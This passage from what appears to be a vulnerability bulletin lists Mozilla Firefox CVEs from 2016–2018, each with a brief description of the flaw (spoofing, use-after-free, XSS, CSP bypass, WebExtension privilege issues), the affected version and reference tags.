A spoofing vulnerability can occur when a malicious site with an extremely long domain name is opened in an Android Custom Tab (a browser panel inside another app) and the default browser is Firefox for Android. This could allow an attacker to spoof which page is actually loaded and in use. Note: this issue only affects Firefox for Android. Other versions and operating systems are unaffected. This vulnerability affects Firefox < 59.2018-06-11not yet calculatedCVE-2018-5138
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Memory safety bugs were reported in Firefox 59. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 60.2018-06-11not yet calculatedCVE-2018-5151
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
An issue where WebExtensions can use the mozAddonManager API to elevate privilege due to privileged pages being allowed in the permissions list. This allows a malicious extension to then install additional extensions without explicit user permission. This vulnerability affects Firefox < 50.2018-06-11not yet calculatedCVE-2016-9075
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Memory safety bugs were reported in Firefox 58. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 59.2018-06-11not yet calculatedCVE-2018-5126
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A buffer overflow in SkiaGl caused when a GrGLBuffer is truncated during allocation. Later writers will overflow the buffer, resulting in a potentially exploitable crash. This vulnerability affects Firefox < 50.1.2018-06-11not yet calculatedCVE-2016-9894
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Memory safety bugs were reported in Firefox 50.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 51.2018-06-11not yet calculatedCVE-2017-5374
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A use-after-free vulnerability can occur when arguments passed to the "IsPotentiallyScrollable" function are freed while still in use by scripts. This results in a potentially exploitable crash. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5100
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
Two use-after-free errors during DOM operations resulting in potentially exploitable crashes. This vulnerability affects Firefox < 50.2018-06-11not yet calculatedCVE-2016-9067
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox
 
The combined, single character, version of the letter 'i' with any of the potential accents in unicode, such as acute or grave, can be spoofed in the addressbar by the dotless version of 'i' followed by the same accent as a second character with most font sets. This allows for domain spoofing attacks because these combined domain names do not display as punycode. This vulnerability affects Firefox < 57.2018-06-11not yet calculatedCVE-2017-7832
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
When a "javascript:" URL is drag and dropped by a user into the addressbar, the URL will be processed and executed. This allows for users to be socially engineered to execute an XSS attack on themselves. This vulnerability affects Firefox < 53.2018-06-11not yet calculatedCVE-2017-5458
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
JavaScript in the "about:webrtc" page is not sanitized properly being assigned to "innerHTML". Data on this page is supplied by WebRTC usage and is not under third-party control, making this difficult to exploit, but the vulnerability could possibly be used for a cross-site scripting (XSS) attack. This vulnerability affects Firefox < 55.2018-06-11not yet calculatedCVE-2017-7799
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
An integer overflow during the parsing of XML using the Expat library. This vulnerability affects Firefox < 50.2018-06-11not yet calculatedCVE-2016-9063
BID
SECTRACK
SECTRACK
CONFIRM
DEBIAN
CONFIRM
mozilla -- firefox
 
A vulnerability where the security wrapper does not deny access to some exposed properties using the deprecated "_exposedProps_" mechanism on proxy objects. These properties should be explicitly unavailable to proxy objects. This vulnerability affects Firefox < 57.2018-06-11not yet calculatedCVE-2017-7831
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Content Security Policy (CSP) is not applied correctly to all parts of multipart content sent with the "multipart/x-mixed-replace" MIME type. This could allow for script to run where CSP should block it, allowing for cross-site scripting (XSS) and other attacks. This vulnerability affects Firefox < 60.2018-06-11not yet calculatedCVE-2018-5164
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
An audio capture session can started under an incorrect origin from the site making the capture request. Users are still prompted to allow the request but the prompt can display the wrong origin, leading to user confusion about which site is making the request to capture an audio stream. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5109
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
Memory safety bugs were reported in Firefox 49. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 50.2018-06-11not yet calculatedCVE-2016-5289
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A STUN server in conjunction with a large number of "webkitRTCPeerConnection" objects can be used to send large STUN packets in a short period of time due to a lack of rate limiting being applied on e10s systems, allowing for a denial of service attack. This vulnerability affects Firefox < 51.2018-06-11not yet calculatedCVE-2017-5388
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Memory safety bugs were reported in Firefox 56. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 57.2018-06-11not yet calculatedCVE-2017-7827
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A mechanism where disruption of the loading of a new web page can cause the previous page's favicon and SSL indicator to not be reset when the new page is loaded. Note: this issue only affects Firefox for Android. Desktop Firefox is unaffected. This vulnerability affects Firefox < 50.2018-06-11not yet calculatedCVE-2016-5298
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Response header name interning does not have same-origin protections and these headers are stored in a global registry. This allows stored header names to be available cross-origin. This vulnerability affects Firefox < 55.2018-06-11not yet calculatedCVE-2017-7797
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A previously installed malicious Android application with same signature-level permissions as Firefox can intercept AuthTokens meant for Firefox only. Note: This issue only affects Firefox for Android. Other versions and operating systems are unaffected. This vulnerability affects Firefox < 50.2018-06-11not yet calculatedCVE-2016-5299
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
The "instanceof" operator can bypass the Xray wrapper mechanism. When called on web content from the browser itself or an extension the web content can provide its own result for that operator, possibly tricking the browser or extension into mishandling the element. This vulnerability affects Firefox < 56.2018-06-11not yet calculatedCVE-2017-7820
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A heap buffer overflow vulnerability may occur in WebAssembly during Memory/Table resizing, resulting in a potentially exploitable crash. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5093
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
WebExtensions may use "view-source:" URLs to view local "file:" URL content, as well as content stored in "about:cache", bypassing restrictions that only allow WebExtensions to view specific content. This vulnerability affects Firefox < 59.2018-06-11not yet calculatedCVE-2018-5134
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A "javascript:" url loaded by a malicious page can obfuscate its location by blanking the URL displayed in the addressbar, allowing for an attacker to spoof an existing page without the malicious page's address being displayed correctly. This vulnerability affects Firefox < 52.2018-06-11not yet calculatedCVE-2017-5420
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Style editor traffic in the Developer Tools can be routed through a service worker hosted on a third party website if a user selects error links when these tools are open. This can allow style editor information used within Developer Tools to leak cross-origin. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5106
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
WebExtensions can use request redirection and a "filterReponseData" filter to bypass host permission settings to redirect network traffic and access content from a host for which they do not have explicit user permission. This vulnerability affects Firefox < 60.2018-06-11not yet calculatedCVE-2018-5166
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
Use-after-free vulnerability in Web Animations when interacting with cycle collection found through fuzzing. This vulnerability affects Firefox < 51.2018-06-11not yet calculatedCVE-2017-5379
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Use-after-free while manipulating the "navigator" object within WebVR. Note: WebVR is not currently enabled by default. This vulnerability affects Firefox < 50.1.2018-06-11not yet calculatedCVE-2016-9896
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
The Find API for WebExtensions can search some privileged pages, such as "about:debugging", if these pages are open in a tab. This could allow a malicious WebExtension to search for otherwise protected data if a user has it open. This vulnerability affects Firefox < 59.2018-06-11not yet calculatedCVE-2018-5132
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
WebExtensions could use the "mozAddonManager" API by modifying the CSP headers on sites with the appropriate permissions and then using host requests to redirect script loads to a malicious site. This allows a malicious extension to then install additional extensions without explicit user permission. This vulnerability affects Firefox < 51.2018-06-11not yet calculatedCVE-2017-5389
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
The Live Bookmarks page and the PDF viewer can run injected script content if a user pastes script from the clipboard into them while viewing RSS feeds or PDF files. This could allow a malicious site to socially engineer a user to copy and paste malicious script content that could then run with the context of either page but does not allow for privilege escalation. This vulnerability affects Firefox < 60.2018-06-11not yet calculatedCVE-2018-5172
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A location bar spoofing attack where the location bar of loaded page will be shown over the content of another tab due to a series of JavaScript events combined with fullscreen mode. Note: This issue only affects Firefox for Android. Other operating systems are not affected. This vulnerability affects Firefox < 51.2018-06-11not yet calculatedCVE-2017-5394
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
If an HTTP authentication prompt is triggered by a background network request from a page or extension, it is displayed over the currently loaded foreground page. Although the prompt contains the real domain making the request, this can result in user confusion about the originating site of the authentication request and may cause users to mistakenly send private credential information to a third party site. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5115
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
During URL parsing, a maliciously crafted URL can cause a potentially exploitable crash. This vulnerability affects Firefox < 50.2018-06-11not yet calculatedCVE-2016-5292
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A shared worker created from a "data:" URL in one tab can be shared by another tab with a different origin, bypassing the same-origin policy. This vulnerability affects Firefox < 59.2018-06-11not yet calculatedCVE-2018-5136
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
Mixed content blocking of insecure (HTTP) sub-resources in a secure (HTTPS) document was not correctly applied for resources that redirect from HTTPS to HTTP, allowing content that should be blocked, such as scripts, to be loaded on a page. This vulnerability affects Firefox < 57.2018-06-11not yet calculatedCVE-2017-7835
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
URLs using "javascript:" have the protocol removed when pasted into the addressbar to protect users from cross-site scripting (XSS) attacks, but if a tab character is embedded in the "javascript:" URL the protocol is not removed and the script will execute. This could allow users to be socially engineered to run an XSS attack against themselves. This vulnerability affects Firefox < 59.2018-06-11not yet calculatedCVE-2018-5143
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
On Windows systems, if non-null-terminated strings are copied into the crash reporter for some specific registry keys, stack memory data can be copied until a null is found. This can potentially contain private data from the local system. Note: This attack only affects Windows operating systems. Other operating systems are not affected. This vulnerability affects Firefox < 55.2018-06-11not yet calculatedCVE-2017-7790
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A non-existent chrome.manifest file will attempt to be loaded during startup from the primary installation directory. If a malicious user with local access puts chrome.manifest and other referenced files in this directory, they will be loaded and activated during startup. This could result in malicious software being added without consent or modification of referenced installed files. This vulnerability affects Firefox < 52.2018-06-11not yet calculatedCVE-2017-5427
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Image for moz-icons can be accessed through the "moz-icon:" protocol through script in web content even when otherwise prohibited. This could allow for information leakage of which applications are associated with specific MIME types by a malicious page. This vulnerability affects Firefox < 59.2018-06-11not yet calculatedCVE-2018-5140
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A mechanism to spoof the Firefox for Android addressbar using a "javascript:" URI. On Firefox for Android, the base domain is parsed incorrectly, making the resulting location less visibly a spoofed site and showing an incorrect domain in appended notifications. This vulnerability affects Firefox < 53.2018-06-11not yet calculatedCVE-2017-5450
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A vulnerability in the notifications Push API where notifications can be sent through service workers by web content without direct user interaction. This could be used to open new tabs in a denial of service (DOS) attack or to display unwanted content from arbitrary URLs to users. This vulnerability affects Firefox < 59.2018-06-11not yet calculatedCVE-2018-5141
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
If a text string that happens to be a filename in the operating system's native format is dragged and dropped onto the addressbar the specified local file will be opened. This is contrary to policy and is what would happen if the string were the equivalent "file:" URL. This vulnerability affects Firefox < 60.2018-06-11not yet calculatedCVE-2018-5182
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
The existence of a specifically requested local file can be found due to the double firing of the "onerror" when the "source" attribute on a "<track>" tag refers to a file that does not exist if the source page is loaded locally. This vulnerability affects Firefox < 51.2018-06-11not yet calculatedCVE-2017-5387
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A Blob URL can violate origin attribute segregation, allowing it to be accessed from a private browsing tab and for data to be passed between the private browsing tab and a normal tab. This could allow for the leaking of private information specific to the private browsing context. This issue is mitigated by the requirement that the user enter the Blob URL manually in order for the access violation to occur. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5108
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A mechanism to inject static HTML into the RSS reader preview page due to a failure to escape characters sent as URL parameters for a feed's "TITLE" element. This vulnerability allows for spoofing but no scripted content can be run. This vulnerability affects Firefox < 53.2018-06-11not yet calculatedCVE-2017-5453
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
If Media Capture and Streams API permission is requested from documents with "data:" or "blob:" URLs, the permission notifications do not properly display the originating domain. The notification states "Unknown protocol" as the requestee, leading to user confusion about which site is asking for this permission. This vulnerability affects Firefox < 59.2018-06-11not yet calculatedCVE-2018-5142
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
When dragging content from the primary browser pane to the addressbar on a malicious site, it is possible to change the addressbar so that the displayed location following navigation does not match the URL of the newly loaded page. This allows for spoofing attacks. This vulnerability affects Firefox < 52.2018-06-11not yet calculatedCVE-2017-5417
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
An attack can use a blob URL and script to spoof an arbitrary addressbar URL prefaced by "blob:" as the protocol, leading to user confusion and further spoofing attacks. This vulnerability affects Firefox < 52.2018-06-11not yet calculatedCVE-2017-5415
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
If a malicious attacker has used another vulnerability to gain full control over a content process, they may be able to replace the alternate data resources stored in the JavaScript Start-up Bytecode Cache (JSBC) for other JavaScript code. If the parent process then runs this replaced code, the executed script would be run with the parent process' privileges, escaping the sandbox on content processes. This vulnerability affects Firefox < 60.2018-06-11not yet calculatedCVE-2018-5163
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
Content Security Policy combined with HTTP to HTTPS redirection can be used by malicious server to verify whether a known site is within a user's browser history. This vulnerability affects Firefox < 50.2018-06-11not yet calculatedCVE-2016-9071
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
The reader view will display cross-origin content when CORS headers are set to prohibit the loading of cross-origin content by a site. This could allow access to content that should be restricted in reader view. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5119
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
An error occurs in the elliptic curve point addition algorithm that uses mixed Jacobian-affine coordinates where it can yield a result "POINT_AT_INFINITY" when it should not. A man-in-the-middle attacker could use this to interfere with a connection, resulting in an attacked party computing an incorrect shared secret. This vulnerability affects Firefox < 55.2018-06-11not yet calculatedCVE-2017-7781
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
If a long user name is used in a username/password combination in a site URL (such as " http://UserName:Password@example.com"), the resulting modal prompt will hang in a non-responsive state or crash, causing a denial of service. This vulnerability affects Firefox < 55.2018-06-11not yet calculatedCVE-2017-7783
BID
SECTRACK
CONFIRM
EXPLOIT-DB
CONFIRM
mozilla -- firefox
 
Web content could access information in the HTTP cache if e10s is disabled. This can reveal some visited URLs and the contents of those pages. This issue affects Firefox 48 and 49. This vulnerability affects Firefox < 49.0.2.2018-06-11not yet calculatedCVE-2016-5288
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
WebExtensions with the appropriate permissions can attach content scripts to Mozilla sites such as accounts.firefox.com and listen to network traffic to the site through the "webRequest" API. For example, this allows for the interception of username and an encrypted password during login to Firefox Accounts. This issue does not expose synchronization traffic directly and is limited to the process of user login to the website and the data displayed to the user once logged in. This vulnerability affects Firefox < 60.2018-06-11not yet calculatedCVE-2018-5152
BID
SECTRACK
CONFIRM
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
The AES-GCM implementation in WebCrypto API accepts 0-length IV when it should require a length of 1 according to the NIST Special Publication 800-38D specification. This might allow for the authentication key to be determined in some instances. This vulnerability affects Firefox < 56.2018-06-11not yet calculatedCVE-2017-7822
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
The location bar in Firefox for Android can be spoofed by forcing a user into fullscreen mode, blocking its exiting, and creating of a fake location bar without any user notification. Note: This issue only affects Firefox for Android. Other versions and operating systems are unaffected. This vulnerability affects Firefox < 50.2018-06-11not yet calculatedCVE-2016-9065
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
The "export" function in the Certificate Viewer can force local filesystem navigation when the "common name" in a certificate contains slashes, allowing certificate content to be saved in unsafe locations with an arbitrary filename. This vulnerability affects Firefox < 51.2018-06-11not yet calculatedCVE-2017-5381
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A vulnerability where WebExtensions can download and attempt to open a file of some non-executable file types. This can be triggered without specific user interaction for the file download and open actions. This could be used to trigger known vulnerabilities in the programs that handle those document types. This vulnerability affects Firefox < 56.2018-06-11not yet calculatedCVE-2017-7821
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
If manipulated hyperlinked text with "chrome:" URL contained in it is dragged and dropped on the "home" icon, the home page can be reset to include a normally-unlinkable chrome page as one of the home page tabs. This vulnerability affects Firefox < 60.2018-06-11not yet calculatedCVE-2018-5169
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
When entered directly, Reader Mode did not strip the username and password section of URLs displayed in the addressbar. This can be used for spoofing the domain of the current page. This vulnerability affects Firefox < 54.2018-06-11not yet calculatedCVE-2017-7762
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
If a document's Referrer Policy attribute is set to "no-referrer" sometimes two network requests are made for "<link>" elements instead of one. One of these requests includes the referrer instead of respecting the set policy to not include a referrer on requests. This vulnerability affects Firefox < 57.2018-06-11not yet calculatedCVE-2017-7842
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A mechanism to bypass Content Security Policy (CSP) protections on sites that have a "script-src" policy of "'strict-dynamic'". If a target website contains an HTML injection flaw an attacker could inject a reference to a copy of the "require.js" library that is part of Firefox's Developer Tools, and then use a known technique using that library to bypass the CSP restrictions on executing injected scripts. This vulnerability affects Firefox < 60.2018-06-11not yet calculatedCVE-2018-5175
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
WebExtensions with the "ActiveTab" permission are able to access frames hosted within the active tab even if the frames are cross-origin. Malicious extensions can inject frames from arbitrary origins into the loaded page and then interact with them, bypassing same-origin user expectations with this permission. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5116
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
If the "app.support.baseURL" preference is changed by a malicious local program to contain HTML and script content, this content is not sanitized. It will be executed if a user loads "chrome://browser/content/preferences/in-content/preferences.xul" directly in a tab and executes a search. This stored preference is also executed whenever an EME video player plugin displays a CDM-disabled message as a notification message. This vulnerability affects Firefox < 59.2018-06-11not yet calculatedCVE-2018-5133
BID
SECTRACK
CONFIRM
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A use-after-free vulnerability can occur when the layer manager is freed too early when rendering specific SVG content, resulting in a potentially exploitable crash. This vulnerability affects Firefox < 55.2018-06-11not yet calculatedCVE-2017-7806
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A memory corruption vulnerability in Skia that can occur when using transforms to make gradients, resulting in a potentially exploitable crash. This vulnerability affects Firefox < 51.2018-06-11not yet calculatedCVE-2017-5377
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
An issue with incorrect ownership model of "privateBrowsing" information exposed through developer tools. This can result in a non-exploitable crash when manually triggered during debugging. This vulnerability affects Firefox < 53.2018-06-11not yet calculatedCVE-2017-5468
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A use-after-free vulnerability can occur when manipulating elements, events, and selection ranges during editor operations. This results in a potentially exploitable crash. This vulnerability affects Firefox < 59.2018-06-11not yet calculatedCVE-2018-5128
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
Feed preview for RSS feeds can be used to capture errors and exceptions generated by privileged content, allowing for the exposure of internal information not meant to be seen by web content. This vulnerability affects Firefox < 51.2018-06-11not yet calculatedCVE-2017-5382
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
If web content on a page is dragged onto portions of the browser UI, such as the tab bar, links can be opened that otherwise would not be allowed to open. This can allow malicious web content to open a locally stored file through "file:" URLs. This vulnerability affects Firefox < 56.2018-06-11not yet calculatedCVE-2017-7812
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A "data:" URL loaded in a new tab did not inherit the Content Security Policy (CSP) of the original page, allowing for bypasses of the policy including the execution of JavaScript. In prior versions when "data:" documents also inherited the context of the original page this would allow for potential cross-site scripting (XSS) attacks. This vulnerability affects Firefox < 57.2018-06-11not yet calculatedCVE-2017-7834
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
SVG loaded through "<img>" tags can use "<meta>" tags within the SVG data to set cookies for that page. This vulnerability affects Firefox < 57.2018-06-11not yet calculatedCVE-2017-7837
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
The web console and JavaScript debugger do not sanitize all output that can be hyperlinked. Both will display "chrome:" links as active, clickable hyperlinks in their output. Web sites should not be able to directly link to internal chrome pages. Additionally, the JavaScript debugger will display "javascript:" links, which users could be tricked into clicking by malicious sites. This vulnerability affects Firefox < 60.2018-06-11not yet calculatedCVE-2018-5167
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
This vulnerability allows an attacker to use the Mozilla Maintenance Service to escalate privilege by having the Maintenance Service invoke the Mozilla Updater to run malicious local files. This vulnerability requires local system access and is a variant of MFSA2013-44. Note: this issue only affects Windows operating systems. This vulnerability affects Firefox < 50.2018-06-11not yet calculatedCVE-2016-5295
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
mozilla -- firefox
 
Inside the JavaScript parser, a cast of an integer to a narrower type can result in data read from outside the buffer being parsed. This usually results in a non-exploitable crash, but can leak a limited amount of information from memory if it matches JavaScript identifier syntax. This vulnerability affects Firefox < 56.2018-06-11not yet calculatedCVE-2017-7813
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Punycode format text will be displayed for entire qualified international domain names in some instances when a sub-domain triggers the punycode display instead of the primary domain being displayed in native script and the sub-domain only displaying as punycode. This could be used for limited spoofing attacks due to user confusion. This vulnerability affects Firefox < 57.2018-06-11not yet calculatedCVE-2017-7838
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
JavaScript can be injected into an exported bookmarks file by placing JavaScript code into user-supplied tags in saved bookmarks. If the resulting exported HTML file is later opened in a browser this JavaScript will be executed. This could be used in social engineering and self-cross-site-scripting (self-XSS) attacks if users were convinced to add malicious tags to bookmarks, export them, and then open the resulting file. This vulnerability affects Firefox < 57.2018-06-11not yet calculatedCVE-2017-7840
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
The "mozAddonManager" allows for the installation of extensions from the CDN for addons.mozilla.org, a publicly accessible site. This could allow malicious extensions to install additional extensions from the CDN in combination with an XSS attack on Mozilla AMO sites. This vulnerability affects Firefox < 51.2018-06-11not yet calculatedCVE-2017-5393
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Development Tools panels of an extension are required to load URLs for the panels as relative URLs from the extension manifest file but this requirement was not enforced in all instances. This could allow the development tools panel for the extension to load a URL that it should not be able to access, including potentially privileged pages. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5112
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A maliciously crafted page loaded to the sidebar through a bookmark can reference a privileged chrome window and engage in limited JavaScript operations violating cross-origin protections. This vulnerability affects Firefox < 50.2018-06-11not yet calculatedCVE-2016-9070
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A use-after-free vulnerability can occur when the thread for a Web Worker is freed from memory prematurely instead of from memory in the main thread while cancelling fetch operations. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5092
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
Low descenders on some Tibetan characters in several fonts on OS X are clipped when rendered in the addressbar. When used as part of an Internationalized Domain Name (IDN) this can be used for domain name spoofing attacks. Note: This attack only affects OS X operating systems. Other operating systems are unaffected. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5121
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Data sent with in multipart channels, such as the multipart/x-mixed-replace MIME type, will ignore the referrer-policy response header, leading to potential information disclosure for sites using this header. This vulnerability affects Firefox < 51.2018-06-11not yet calculatedCVE-2017-5385
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
An issue where a "<select>" dropdown menu can be used to cover location bar content, resulting in potential spoofing attacks. This attack requires e10s to be enabled in order to function. This vulnerability affects Firefox < 50.2018-06-11not yet calculatedCVE-2016-9076
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
WebExtensions could use popups and panels in the extension UI to load an "about:" privileged URL, violating security checks that disallow this behavior. This vulnerability affects Firefox < 56.2018-06-11not yet calculatedCVE-2017-7816
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
When a new Firefox profile is created on 64-bit Windows installations, the sandbox for 64-bit NPAPI plugins is not enabled by default. Note: This issue only affects 64-bit Windows. 32-bit Windows and other operating systems are unaffected. This vulnerability affects Firefox < 50.2018-06-11not yet calculatedCVE-2016-9072
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A potential integer overflow in the "DoCrypt" function of WebCrypto was identified. If a means was found of exploiting it, it could result in an out-of-bounds write. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5122
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A use-after-free during web animations when working with timelines resulting in a potentially exploitable crash. This vulnerability affects Firefox < 50.2018-06-11not yet calculatedCVE-2016-9068
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
A use-after-free vulnerability can occur when manipulating floating "first-letter" style elements, resulting in a potentially exploitable crash. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5101
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
When the text of a specially formatted URL is dragged to the addressbar from page content, the displayed URL can be spoofed to show a different site than the one loaded. This allows for phishing attacks where a malicious page can spoof the identify of another site. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5111
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
Memory safety bugs were reported in Firefox 57. Some of these bugs showed evidence of memory corruption and we presume that with enough effort that some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 58.2018-06-11not yet calculatedCVE-2018-5090
BID
SECTRACK
CONFIRM
UBUNTU
CONFIRM
mozilla -- firefox
 
A previously installed malicious Android application which defines a specific signature-level permissions used by Firefox can access API keys meant for Firefox only. Note: This issue only affects Firefox for Android. Other versions and operating systems are unaffected. This vulnerability affects Firefox < 50.2018-06-11not yet calculatedCVE-2016-9061
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- firefox
 
Control characters prepended before "javascript:" URLs pasted in the addressbar can cause the leading characters to be ignored and the pasted JavaScript to be executed instead of being blocked. This could be used in social engineering and self-cross-site-scripting (self-XSS) attacks where users are convinced to copy and paste text into the addressbar. This vulnerability affects Firefox < 57.2018-06-11not yet calculatedCVE-2017-7839
BID
SECTRACK
CONFIRM
CONFIRM
mozilla -- multiple_productsA use-after-free vulnerability in frame selection triggered by a combination of malicious script content and key presses by a user. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.2018-06-11not yet calculatedCVE-2017-5460
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
